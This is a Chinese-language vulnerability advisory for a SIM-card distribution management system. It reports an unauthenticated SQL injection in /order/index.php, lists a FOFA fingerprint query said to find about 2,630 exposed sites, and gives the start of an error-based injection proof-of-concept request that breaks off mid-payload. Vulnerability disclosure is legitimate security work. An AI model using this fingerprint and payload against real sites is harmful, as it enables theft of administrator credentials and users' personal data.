产品简介
号卡极团分销管理系统,同步对接多平台,同步订单信息,支持敢探号一键上架,首页多套U1+商品下单页多套模板,订单查询支持实时物流信息、支持代理商自定义域名、泛域名绑定,内置敢探号、172平台、号氪云平台第三方接口以及号卡网同系统对接!
漏洞概述
号卡极团分销管理系统 /order/index.php 接口存在 SQL注入漏洞只,未经身份验证攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
网络测绘
fofa:icon_hash=”-795291075”
网络资产数量:
2,630 条匹配结果
漏洞复现
POC
GET /order/index.php?pid=1%27%20AND%20(extractvalue(1,concat(0x7e,